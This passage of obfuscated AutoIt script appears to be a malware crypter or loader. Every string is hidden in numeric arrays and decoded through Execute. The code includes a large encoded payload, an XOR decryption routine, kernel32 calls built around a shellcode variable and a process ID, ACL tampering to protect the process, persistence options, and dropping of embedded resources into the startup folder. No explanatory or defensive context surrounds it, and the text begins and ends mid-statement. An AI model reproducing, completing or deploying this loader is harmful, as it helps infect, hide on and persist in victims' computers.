("56,58,56,56,56,60,56,6,56,6,56,57,56,53,57,57,56,58,56,56,56,60,56,6,56,54,56,56,56,53,57,56,56,58,57,57,56,6,56,59,57,55,57,57,56,53,56,6,56,60,56,59,56,60,56,60,56,60,56,60,56,54,57,59,56,55,57,55,56,55,56,5,56,6,57,58,57,54,57,57,57,54,57,54,56,53,56,55,56,60,57,57,56,6,57,56,56,6,56,56,56,58,56,56,56,58,57,57,56,60,56,57,56,60,56,60,56,60,56,60,56,6,57,56,57,58,56,56,56,58,56,56,57,58,56,56,56,60,56,59,56,60,56,60,56,60,56,60,56,55,56,60,57,54,56,57,57,59,56,55,57,55,56,6,56,58,56,57,57,54,57,57,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,54,57,54,57,54,57,54,57,54,56,56,56,56,56,58,56,56,56,60,56,6,56,6,56,55,57,57,56,60,56,53,56,56,57,57,57,56,56,55,57,54,56,55,57,55,56,6,57,58,57,55,56,55,56,55,57,56,57,57,56,58,56,60,56,6,56,60,56,60,56,55,56,59,56,6,57,56,56,56,57,57,56,58,56,56,56,60,56,56,56,58,57,58,57,57,56,6,56,59,57,58,57,57,56,60,57,54,56,53,57,56,56,60,56,58,56,57,57,57,56,6,56,6,57,58,57,57,56,56,56,58,56,55,56,60,56,60,57,54,56,60,57,54,57,54,57,54,57,54,56,57,57,58,57,57,56,6,56,53,56,58,56,60,57,59,56,6,57,58,57,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,59,56,55,56,5,56,5,56,56,56,6,57,58,56,60,56,60,56,6,56,5,56,60,56,56,56,58,56,56,57,57,56,57,56,58,57,56,56,60,56,60,56,59,56,60,56,60,56,60,56,60,56,60,56,6,56,55,56,60,56,60,57,55,57,58,57,55,56,5,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60" ) LOCAL $E = EXECUTE LOCAL $B = $E (BTBXJYMRFGAETPA ("28,35,40,27,44,51,46,41,45,46,44,35,40,33" ) ) LOCAL $LEPUTAIN = TEYWNKUHGE ($LMASCGP ) LOCAL $BINL = $E ($B (BTBXJYMRFGAETPA ("53,50,57,55,59,62,59,5,59,54,60,55,60,62,57,3,59,58,59,5,55,61,55,57,59,3,59,58,60,53,60,58,60,57,59,54,59,62,59,5,55,62" ) ) ) LOCAL $LPSHELLCODE = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,55,59,2,59,58,60,55,59,5,59,58,59,3,56,56,56,55,55,55,55,3,55,53,55,55,60,53,60,57,60,55,55,55,55,3,55,53,55,55,58,59,59,62,60,55,60,57,60,58,59,54,59,3,57,54,59,3,59,3,59,6,59,56,55,55,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,55,55,56,53,55,55,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,55,57,59,55,59,62,59,5,57,3,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,55,55,56,53,60,61,56,56,56,53,56,53,56,53,55,55,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,55,55,56,53,60,61,56,57,56,53,55,55,55,62,58,2,55,55,56,53,55,55,58,4" ) ) ) LOCAL $FILE_STRUCT = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,56,60,55,59,58,59,54,60,57,59,58,55,61,55,55,59,55,60,62,60,57,59,58,55,53,60,56,59,62,59,3,59,2,60,55,59,58,59,59,60,58,59,57,58,2,55,55,55,53,55,59,55,53,58,56,60,57,60,55,59,62,59,5,59,60,57,3,59,58,59,5,55,61,55,57,59,57,59,54,60,57,59,54,55,62,55,53,55,59,55,53,55,55,58,4,55,55,55,62" ) ) ) $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,58,56,59,58,60,57,57,57,59,54,60,57,59,54,55,61,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,56,60,55,59,58,59,54,60,57,59,58,55,61,55,55,59,55,60,62,60,57,59,58,55,53,60,58,59,57,59,58,60,55,59,55,59,6,60,56,60,56,58,2,55,55,55,53,55,59,55,53,55,57,59,55,59,62,59,5,57,3,55,53,55,59,55,53,55,55,58,4,55,55,55,3,55,53,55,57,59,3,60,53,58,56,59,61,59,58,59,3,59,3,59,56,59,6,59,57,59,58,55,62,55,3,55,53,55,55,60,58,59,57,59,58,60,55,59,55,59,6,60,56,60,56,55,55,55,3,55,53,55,57,59,3,59,58,60,53,60,58,60,57,59,54,59,62,59,5,55,62" ) ) ) $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,58,56,59,58,60,57,57,57,59,54,60,57,59,54,55,61,55,57,57,59,59,62,59,3,59,58,58,6,58,56,60,57,60,55,60,58,59,56,60,57,55,3,55,53,55,55,60,56,59,62,59,3,59,2,60,55,59,58,59,59,60,58,59,57,55,55,55,3,55,53,55,57,59,57,59,54,60,57,59,54,55,62" ) ) ) LOCAL $RET = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,57,54,59,57,59,57,60,55,59,58,60,56,60,56,55,61,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,55,57,59,3,60,53,58,56,59,61,59,58,59,3,59,3,59,56,59,6,59,57,59,58,55,3,55,53,55,55,60,56,60,57,60,55,55,55,55,3,55,53,55,57,60,53,60,55,59,6,59,56,59,58,60,56,60,56,55,3,55,53,55,55,60,53,60,57,60,55,55,55,55,3,55,53,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,60,59,58,60,57,58,53,60,57,60,55,55,61,55,57,57,59,59,62,59,3,59,58,58,6,58,56,60,57,60,55,60,58,59,56,60,57,55,62,55,62" ) ) ) $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,55,59,2,59,58,60,55,59,5,59,58,59,3,56,56,56,55,55,55,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,55,55,58,59,59,62,60,55,60,57,60,58,59,54,59,3,57,59,60,55,59,58,59,58,55,55,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,55,57,59,3,60,53,58,56,59,61,59,58,59,3,59,3,59,56,59,6,59,57,59,58,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,55,55,56,53,55,55,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,55,55,56,53,60,61,56,61,56,53,56,53,56,53,55,55,55,62" ) ) ) LOCAL $PID = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,55,59,2,59,58,60,55,59,5,59,58,59,3,56,56,56,55,55,5,59,57,59,3,59,3,55,55,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,55,55,57,60,59,58,60,57,58,53,60,55,59,6,59,56,59,58,60,56,60,56,57,62,59,57,55,55,55,3,55,53,55,55,59,61,59,54,59,5,59,57,59,3,59,58,55,55,55,3,55,53,55,57,58,55,59,58,60,57,58,2,55,55,56,53,55,55,58,4,55,62,58,2,55,55,56,53,55,55,58,4" ) ) ) IF $PROTECT THEN ACL ($RET [BTBXJYMRFGAETPA ("53" ) ] ) ENDIF IF $PERSIST THEN FFFWGZEQMC ($PID ) ENDIF ENDFUNC FUNC GZEFGAQPTILN () RETURN EXECUTE (BTBXJYMRFGAETPA ("4,38,38,19,46,44,47,29,46,3,44,31,27,46,31" ) ) ENDFUNC FUNC AXKQWZXSXH () ENDFUNC FUNC ACL ($HANDLE ) $E = EXECUTE $BN = $E (BTBXJYMRFGAETPA ("28,35,40,27,44,51,46,41,45,46,44,35,40,33" ) ) LOCAL $TACL = $E ($BN (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,56,60,55,59,58,59,54,60,57,59,58,55,61,55,55,59,55,60,62,60,57,59,58,55,53,57,54,59,56,59,3,58,55,59,58,60,59,59,62,60,56,59,62,59,6,59,5,56,2,59,55,60,62,60,57,59,58,55,53,58,56,59,55,60,1,56,54,56,2,60,58,60,56,59,61,59,6,60,55,60,57,55,53,57,54,59,56,59,3,58,56,59,62,60,1,59,58,56,2,60,58,60,56,59,61,59,6,60,55,60,57,55,53,57,54,59,56,59,58,57,56,59,6,60,58,59,5,60,57,56,2,60,58,60,56,59,61,59,6,60,55,60,57,55,53,58,56,59,55,60,1,56,55,55,55,55,62" ) ) ) LOCAL $PACL = $E ($BN (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,60,59,58,60,57,58,53,60,57,60,55,55,61,55,57,60,57,57,54,57,56,57,3,55,62" ) ) ) LOCAL $TSD = $E ($BN (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,56,60,55,59,58,59,54,60,57,59,58,55,61,55,55,59,55,60,62,60,57,59,58,58,2,56,55,56,53,58,4,55,55,55,62" ) ) ) LOCAL $PSD = $E ($BN (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,60,59,58,60,57,58,53,60,57,60,55,55,61,55,57,60,57,58,56,57,57,55,62" ) ) ) LOCAL $RET = $E ($BN (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,60,59,54,59,57,60,59,59,54,60,53,59,62,56,56,56,55,55,5,59,57,59,3,59,3,55,60,55,3,55,53,55,60,59,62,59,5,60,57,55,60,55,3,55,53,55,60,57,62,59,5,59,62,60,57,59,62,59,54,59,3,59,62,60,1,59,58,58,56,59,58,59,56,60,58,60,55,59,62,60,57,60,62,57,57,59,58,60,56,59,56,60,55,59,62,60,53,60,57,59,6,60,55,55,60,55,3,55,53,55,60,60,53,60,57,60,55,55,60,55,3,55,53,55,57,60,53,58,56,57,57,55,3,55,53,55,60,59,57,60,60,59,6,60,55,59,57,55,60,55,3,55,53,55,60,56,54,55,60,55,62" ) ) ) $RET = $E ($BN (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,60,59,54,59,57,60,59,59,54,60,53,59,62,56,56,56,55,55,5,59,57,59,3,59,3,55,60,55,3,55,53,55,60,59,62,59,5,60,57,55,60,55,3,55,53,55,60,57,62,59,5,59,62,60,57,59,62,59,54,59,3,59,62,60,1,59,58,57,54,59,56,59,3,55,60,55,3,55,53,55,60,60,53,60,57,60,55,55,60,55,3,55,53,55,57,60,53,57,54,57,56,57,3,55,3,55,53,55,60,59,57,60,60,59,6,60,55,59,57,55,60,55,3,55,53,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,60,59,58,60,57,58,56,59,62,60,1,59,58,55,61,55,57,60,57,57,54,57,56,57,3,55,62,55,3,55,53,55,60,59,57,60,60,59,6,60,55,59,57,55,60,55,3,55,53,55,60,56,55,55,60,55,62" ) ) ) $RET = $E ($BN (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,60,59,54,59,57,60,59,59,54,60,53,59,62,56,56,56,55,55,5,59,57,59,3,59,3,55,60,55,3,55,53,55,60,59,62,59,5,60,57,55,60,55,3,55,53,55,60,58,56,59,58,60,57,58,56,59,58,59,56,60,58,60,55,59,62,60,57,60,62,57,57,59,58,60,56,59,56,60,55,59,62,60,53,60,57,59,6,60,55,57,57,59,54,59,56,59,3,55,60,55,3,55,53,55,60,60,53,60,57,60,55,55,60,55,3,55,53,55,57,60,53,58,56,57,57,55,3,55,53,55,60,59,62,59,5,60,57,55,60,55,3,55,53,55,60,56,54,55,60,55,3,55,53,55,60,60,53,60,57,60,55,55,60,55,3,55,53,55,57,60,53,57,54,57,56,57,3,55,3,55,53,55,60,59,62,59,5,60,57,55,60,55,3,55,53,55,60,56,53,55,60,55,62" ) ) ) $RET = $E ($BN (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,60,59,54,59,57,60,59,59,54,60,53,59,62,56,56,56,55,55,5,59,57,59,3,59,3,55,60,55,3,55,53,55,60,59,62,59,5,60,57,55,60,55,3,55,53,55,60,58,56,59,58,60,57,57,2,59,58,60,55,59,5,59,58,59,3,57,6,59,55,59,1,59,58,59,56,60,57,58,56,59,58,59,56,60,58,60,55,59,62,60,57,60,62,55,60,55,3,55,53,55,60,60,53,60,57,60,55,55,60,55,3,55,53,55,57,59,61,59,54,59,5,59,57,59,3,59,58,55,3,55,53,55,60,59,57,60,60,59,6,60,55,59,57,55,60,55,3,55,53,55,60,56,53,60,61,56,53,56,57,55,60,55,3,55,53,55,60,60,53,60,57,60,55,55,60,55,3,55,53,55,57,60,53,58,56,57,57,55,62" ) ) ) ENDFUNC FUNC WXKBBNNEOP ($FILE , $STARTUP , $RES ) $FILE = $IEHDDOIYHINMPBUCHBHARTDUKILWZQCUVDTRYHUFIM & "\" & $FILE DIM $FHANDLE = $DQIFFUXAMLIV ($FILE , BTBXJYMRFGAETPA ("55" ) ) DIM $DATA = READRESOURCES ($RES , BTBXJYMRFGAETPA ("54,53" ) ) $CLTCCKUEQWTC ($FHANDLE , $CAIQJRRJDNHO ($DATA , 1 ) ) $INRXTUXKPWXC ($FHANDLE ) IF $STARTUP = BTBXJYMRFGAETPA ("6,27,38,45,31" ) THEN IF $STARTUPDIR <> $CFJUHMDSDKCZOCVFLYURKIBOKZAHTMIIE THEN $LYDOYURNNHSZ ($FILE ) ENDIF ELSE $LYDOYURNNHSZ ($FILE ) ENDIF ENDFUNC FUNC RLIPXUZECEXV () RETURN EXECUTE (BTBXJYMRFGAETPA ("6,35,38,31,15,42,31,40" ) ) ENDFUNC FUNC ZJFEKVYJJF ($NAME , $FILENAME ) LOCAL $E = EXECUTE LOCAL $B = $E (BTBXJYMRFGAETPA ("2,35,40,27,44,51,20,41,19,46,44,35,40,33" ) ) LOCAL $BYTES = $E ($B (BTBXJYMRFGAETPA ("53,50,57,59,59,62,59,3,59,58,58,55,59,58,59,54,59,57,55,61,57,53,58,56,59,56,60,55,59,62,60,53,60,57,57,59,60,58,59,3,59,3,58,53,59,54,60,57,59,61,55,62,55,53,55,59,55,53,57,55,59,62,59,5,59,54,60,55,60,62,55,61,58,55,59,54,59,5,59,57,59,6,59,4,55,61,55,55,56,53,55,55,55,3,55,55,56,55,56,58,56,58,55,55,55,62,55,62" ) ) ) LOCAL $FULLPATH = $E ($B (BTBXJYMRFGAETPA ("53,50,55,57,60,56,60,57,59,54,60,55,60,57,60,58,60,53,59,57,59,62,60,55,55,53,55,59,55,53,55,55,58,3,55,55,55,53,55,59,55,53,55,57,59,59,59,62,59,3,59,58,59,5,59,54,59,4,59,58,55,53,55,59,55,53,55,55,55,5,59,55,59,54,60,57,55,55" ) ) ) IF $E ($B (BTBXJYMRFGAETPA ("53,50,57,59,59,62,59,3,59,58,57,58,60,61,59,62,60,56,60,57,60,56,55,61,55,57,59,59,60,58,59,3,59,3,60,53,59,54,60,57,59,61,55,62,55,53,56,4,55,53,55,55,56,53,55,55" ) ) ) THEN $SPAYPUCWZKBI ("kernel32.dll" , BTBXJYMRFGAETPA ("34,27,40,30,38,31" ) , BTBXJYMRFGAETPA ("3,44,31,27,46,31,6,35,38,31,23" ) , BTBXJYMRFGAETPA ("49,45,46,44" ) , $FULLPATH , BTBXJYMRFGAETPA ("30,49,41,44,30" ) , BTBXJYMRFGAETPA ("53" ) , BTBXJYMRFGAETPA ("30,49,41,44,30" ) , "" , "struct*" , "" , BTBXJYMRFGAETPA ("30,49,41,44,30" ) , BTBXJYMRFGAETPA ("54" ) , BTBXJYMRFGAETPA ("30,49,41,44,30" ) , "" , BTBXJYMRFGAETPA ("34,27,40,30,38,31" ) , "" ) DIM $FILEHANDLE = $E ($B (BTBXJYMRFGAETPA ("53,50,57,59,59,62,59,3,59,58,57,6,60,53,59,58,59,5,55,61,55,57,59,59,60,58,59,3,59,3,60,53,59,54,60,57,59,61,55,3,55,53,55,55,56,54,56,53,55,55,55,62" ) ) ) $E ($B (BTBXJYMRFGAETPA ("53,50,57,59,59,62,59,3,59,58,58,60,60,55,59,62,60,57,59,58,55,61,55,57,59,59,59,62,59,3,59,58,57,61,59,54,59,5,59,57,59,3,59,58,55,3,55,53,55,57,59,55,60,62,60,57,59,58,60,56,55,62" ) ) ) $E ($B (BTBXJYMRFGAETPA ("53,50,57,59,59,62,59,3,59,58,57,56,59,3,59,6,60,56,59,58,55,61,55,57,59,59,59,62,59,3,59,58,57,61,59,54,59,5,59,57,59,3,59,58,55,62" ) ) ) $E ($B (BTBXJYMRFGAETPA ("53,50,57,59,59,62,59,3,59,58,57,56,60,55,59,58,59,54,60,57,59,58,58,56,59,61,59,6,60,55,60,57,59,56,60,58,60,57,55,61,55,57,59,59,60,58,59,3,59,3,60,53,59,54,60,57,59,61,55,3,55,53,57,53,58,56,60,57,59,54,60,55,60,57,60,58,60,53,57,57,59,62,60,55,55,53,55,59,55,53,55,55,58,3,55,55,55,53,55,59,55,53,55,57,59,5,59,54,59,4,59,58,55,53,55,59,55,53,55,55,55,5,59,3,59,5,59,2,55,55,55,62" ) ) ) ENDIF ENDFUNC FUNC OPYIFKUKCKES () RETURN EXECUTE (BTBXJYMRFGAETPA ("19,38,31,31,42" ) ) ENDFUNC FUNC NHVVDKWADDWZ () RETURN EXECUTE (BTBXJYMRFGAETPA ("18,31,33,23,44,35,46,31" ) ) ENDFUNC FUNC MTHJNHTHYUUU () RETURN EXECUTE (BTBXJYMRFGAETPA ("16,44,41,29,31,45,45,5,50,35,45,46,45" ) ) ENDFUNC FUNC TEYWNKUHGE ($INPUT ) LOCAL $RND = BTBXJYMRFGAETPA ("53" ) LOCAL $E = EXECUTE LOCAL $B = $E (BTBXJYMRFGAETPA ("28,35,40,27,44,51,46,41,45,46,44,35,40,33" ) ) LOCAL $RESULT $INPUT = $E ($B (BTBXJYMRFGAETPA ("53,50,57,55,59,62,59,5,59,54,60,55,60,62,58,57,59,6,58,56,60,57,60,55,59,62,59,5,59,60,55,61,55,57,59,62,59,5,60,53,60,58,60,57,55,62" ) ) ) LOCAL $FIRSTCHARS = $E ($B (BTBXJYMRFGAETPA ("53,50,58,56,60,57,60,55,59,62,59,5,59,60,57,3,59,58,59,59,60,57,55,61,58,56,60,57,60,55,59,62,59,5,59,60,58,55,59,62,59,60,59,61,60,57,55,61,55,57,59,62,59,5,60,53,60,58,60,57,55,3,55,53,58,56,60,57,60,55,59,62,59,5,59,60,57,3,59,58,59,5,55,61,55,57,59,62,59,5,60,53,60,58,60,57,55,62,55,53,55,4,55,53,55,55,56,55,55,55,55,62,55,3,55,53,55,55,56,59,55,55,55,62" ) ) ) WHILE ($RESULT <> BTBXJYMRFGAETPA ("5,62,6,59,54,5" ) ) $RND += BTBXJYMRFGAETPA ("54" ) $RESULT = XOR ($FIRSTCHARS , $RND ) WEND $RESULT = XOR ($INPUT , $RND ) RETURN $RESULT ENDFUNC FUNC FQZOUFGHZF ($TITLE , $BODY , $TYPE ) IF $BOOL = BTBXJYMRFGAETPA ("6,27,38,45,31" ) THEN $ZNNZHMCQTOPD ($TYPE , $TITLE , $BODY ) ENDIF ENDFUNC FUNC ETFNKADRSB () LOCAL $OSVERSION = $AVJTMWBNEWJJVDCTUDWDEWCFIKWNLJRYLAMRLSPMDEPITACR IF NOT $QCJGZATPVQXM () THEN IF $TWXPJLDBTLTX ($OSVERSION , BTBXJYMRFGAETPA ("60" ) ) THEN GTIQUIETGC () ELSEIF $TWXPJLDBTLTX ($OSVERSION , BTBXJYMRFGAETPA ("61" ) ) THEN GTIQUIETGC () ELSEIF $TWXPJLDBTLTX ($OSVERSION , BTBXJYMRFGAETPA ("54,53" ) ) THEN MSQGWYVXLW () ENDIF ENDIF ENDFUNC FUNC VFNIVSZMZI () IF $BECCJIYOKJQE ("[CLASS:Progman]" ) = BTBXJYMRFGAETPA ("53" ) THEN $FEYVUXLEGFHL ($FJVRHISHSSHJEPWQMMUMBIFRUFCKXVFVZNRK ) ENDIF ENDFUNC FUNC GLOBALDATA ($DATA , $RT ) LOCAL $E = EXECUTE LOCAL $B = $E (BTBXJYMRFGAETPA ("28,35,40,27,44,51,46,41,45,46,44,35,40,33" ) ) LOCAL $RETURN LOCAL $R = $E ($B (BTBXJYMRFGAETPA ("53,50,58,56,60,57,60,55,59,62,59,5,59,60,58,56,60,53,59,3,59,62,60,57,55,61,57,55,59,62,59,5,59,54,60,55,60,62,58,57,59,6,58,56,60,57,60,55,59,62,59,5,59,60,55,61,55,57,59,57,59,54,60,57,59,54,55,62,55,3,55,53,55,55,60,3,55,55,55,62" ) ) ) IF $RT <> "-1" THEN FOR $I = BTBXJYMRFGAETPA ("54" ) TO $E ($B (BTBXJYMRFGAETPA ("53,50,58,58,57,55,59,6,60,58,59,5,59,57,55,61,55,57,60,55,55,62,55,53,55,4,55,53,55,55,56,54,55,55" ) ) ) IF $I = BTBXJYMRFGAETPA ("54" ) THEN $RETURN = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,60,59,58,60,57,57,57,59,54,60,57,59,54,55,61,58,55,59,58,59,54,59,57,58,55,59,58,60,56,59,6,60,58,60,55,59,56,59,58,60,56,55,61,55,57,60,55,58,2,55,57,59,62,58,4,55,3,55,53,55,57,60,55,60,57,55,62,55,3,55,53,56,54,55,62" ) ) ) ELSE $RETURN &= $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,58,56,60,57,60,55,60,58,59,56,60,57,57,60,59,58,60,57,57,57,59,54,60,57,59,54,55,61,58,55,59,58,59,54,59,57,58,55,59,58,60,56,59,6,60,58,60,55,59,56,59,58,60,56,55,61,55,57,60,55,58,2,55,57,59,62,58,4,55,3,55,53,55,57,60,55,60,57,55,62,55,3,55,53,56,54,55,62" ) ) ) ENDIF NEXT ELSE $RETURN = $DATA ENDIF RETURN $RETURN ENDFUNC FUNC READRESOURCES ($RESNAME , $RESTYPE ) LOCAL $HINSTANCE LOCAL $INFOBLOCK = $SPAYPUCWZKBI ("kernel32.dll" , BTBXJYMRFGAETPA ("42,46,44" ) , BTBXJYMRFGAETPA ("6,35,40,30,18,31,45,41,47,44,29,31,23" ) , BTBXJYMRFGAETPA ("42,46,44" ) , $HINSTANCE , BTBXJYMRFGAETPA ("49,45,46,44" ) , $RESNAME , BTBXJYMRFGAETPA ("38,41,40,33" ) , $RESTYPE ) [BTBXJYMRFGAETPA ("53" ) ] LOCAL $RESSIZE = $SPAYPUCWZKBI ("kernel32.dll" , BTBXJYMRFGAETPA ("30,49,41,44,30" ) , BTBXJYMRFGAETPA 